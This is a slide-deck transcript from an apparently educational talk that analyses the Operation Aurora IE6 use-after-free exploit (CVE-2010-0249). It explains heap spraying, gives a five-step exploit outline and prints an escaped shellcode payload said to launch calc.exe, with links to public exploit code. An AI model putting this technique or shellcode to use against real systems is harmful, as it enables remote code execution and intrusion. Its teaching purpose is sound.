exploit analysis. anatomy of the talk background “operation aurora” the heap the heap spray ...
TRANSCRIPT
Anatomy of the Talk
Background “Operation Aurora” The Heap The Heap Spray The Vulnerability The Exploit The Code The Debugging The Demo The End
Background
December ’09: China hacks Google Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit
Background
December ’09: China hacks Google Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law
enforcement agencies to monitor emails in order to spy on human rights activists and others
Background
December ’09: China hacks Google Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law
enforcement agencies to monitor emails in order to spy on human rights activists and others
Jan ’10: Google attacks China Threatens to stop censoring search results
Background
December ’09: China hacks Google Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law
enforcement agencies to monitor emails in order to spy on human rights activists and others
Jan ’10: Google attacks China Threatens to stop censoring search results Reveals they hacked China back- black hats ftw!
Background
December ’09: China hacks Google Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law
enforcement agencies to monitor emails in order to spy on human rights activists and others
Jan ’10: Google attacks China Threatens to stop censoring search results Reveals they hacked China back- black hats ftw! The world goes ape-shit
Background
December ’09: China hacks Google Adobe vulnerabilities suspected at first Later, IE6 was identified as the culprit Chinese hackers breached an internal auditing tool used by law
enforcement agencies to monitor emails in order to spy on human rights activists and others
Jan ’10: Google attacks China Threatens to stop censoring search results Reveals they hacked China back- black hats ftw! The world goes ape-shit
Jan 14th
Exploit code released on the net
“Operation Aurora”
Sophisticated, multitier attack1. Possible email forgery2. 0-day IE6 exploit (CVE-2010-0249) *16% browser share
“Operation Aurora”
Sophisticated, multitier attack1. Possible email forgery2. 0-day IE6 exploit (CVE-2010-0249) *16% browser share
3. Payload downloads and activates malware
“Operation Aurora”
Sophisticated, multitier attack1. Possible email forgery2. 0-day IE6 exploit (CVE-2010-0249) *16% browser share
3. Payload downloads and activates malware4. Remote connection to attacker is established
“Operation Aurora”
Sophisticated, multitier attack1. Possible email forgery2. 0-day IE6 exploit (CVE-2010-0249) *16% browser share
3. Payload downloads and activates malware4. Remote connection to attacker is established5. ???
“Operation Aurora”
Sophisticated, multitier attack1. Possible email forgery2. 0-day IE6 exploit (CVE-2010-0249) *16% browser share
3. Payload downloads and activates malware4. Remote connection to attacker is established5. ???6. Profit
The Heap
First, a little about memory User applications store dynamic data in
the heap
AVAILABLE HEAP
HEAP
The Heap
First, a little about memory User applications store dynamic data in
the heap In windows, the heap extends until
address 0x7fffffff
HEAP
USEABLE HEAP
0x7fffffff
The Heap
First, a little about memory User applications store dynamic data in
the heap In windows, the heap extends until
address 0x7fffffff As a program uses more memory, the useable
heap grows HEAP
USEABLE HEAP
The Heap
First, a little about memory User applications store dynamic data in
the heap In windows, the heap extends until
address 0x7fffffff As a program uses more memory, the useable
heap grows The more the useable heap
grows, the more space we have to play with…
HEAP
USEABLE HEAP
The Heap
First, a little about memory User applications store dynamic data in
the heap In windows, the heap extends until
address 0x7fffffff As a program uses more memory, the useable
heap grows The more the useable heap
grows, the more space we have to play with…
How can we exploit this?
HEAP
USEABLE HEAP
The Heap Spray
Heap spray! Fills the heap up with garbage data +
shellcode (ie “sprays” data at the heap)HEAP
USEABLE HEAPINJECTED
INJECTEDINJECTEDINJECTED
The Heap Spray
Heap spray! Fills the heap up with garbage data +
shellcode (ie “sprays” data at the heap) If we can get our program
to call or jump somewherein our injected heap, win!
HEAP
USEABLE HEAPINJECTED
INJECTEDINJECTEDINJECTED
jmp here plz kthx
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
In pictures!
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
In pictures!
USEABLE HEAP
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
In pictures!
USEABLE HEAP
OBJECT∙ Create an object
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
In pictures!
USEABLE HEAP
OBJECT∙ Create an object
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
In pictures!
USEABLE HEAP
∙ Delete object
The memory shouldn’t be useable again without being reallocated…
The Vulnerability
CVE-2010-0249 HTML Object Memory Corruption Vulnerability
“Use after free” Remote code execution Load an object, delete it, inject your code, call the object
In pictures!
USEABLE HEAP
USEABLE SPACE∙ Delete object
The memory shouldn’t be useable again without being reallocated… but it is!
The Exploit
5 Steps1. Create space to overwrite our yet to
be created object with2. Spray the heap with nops and our
payload
The Exploit
5 Steps1. Create space to overwrite our yet to
be created object with2. Spray the heap with nops and our
payload3. Load and dereference an image as our
object
The Exploit
5 Steps1. Create space to overwrite our yet to
be created object with2. Spray the heap with nops and our
payload3. Load and dereference an image as our
object4. Inject a pointer to our malicious code
(step 2) inside the memory of our “image”
The Exploit
5 Steps1. Create space to overwrite our yet to
be created object with2. Spray the heap with nops and our
payload3. Load and dereference an image as our
object4. Inject a pointer to our malicious code
(step 2) inside the memory of our “image”
5. Call the “image” again
The Debugging
We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE");
The Debugging
We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE");
If it works, EIP (the next instruction to be executed), should now contain “SHELLCODE SHELLCODE”
The Debugging
We’ll load up the exploit with our shell code:
payload = unescape("%uccccSHELLCODE SHELLCODE");
If it works, EIP (the next instruction to be executed), should now contain “SHELLCODE SHELLCODE”
Note: %ucccc == int 3, which is a debugging breakpoint
The Demo
Inject shellcode to run calc.exe
payload_calc = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
The Demo
Inject shellcode to run calc.exe
payload_calc = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
Looks fancy, huh?
References
General http://arstechnica.com/tech-policy/news/2010/01/google-and-china-the-attacks-and-their-aftermath.ars http://www.mcafee.com/us/threat_center/operation_aurora.html http://www.geoffchappell.com/notes/security/aurora/index.htm
In depth http://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit http://www.sophos.com/blogs/duck/g/2010/01/20/aurora-exploit-live/
Code http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249 http://www.exploit-db.com/exploits/11167 http
://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
Presentation http://www.calpolyswift.org/
Under “Presentations”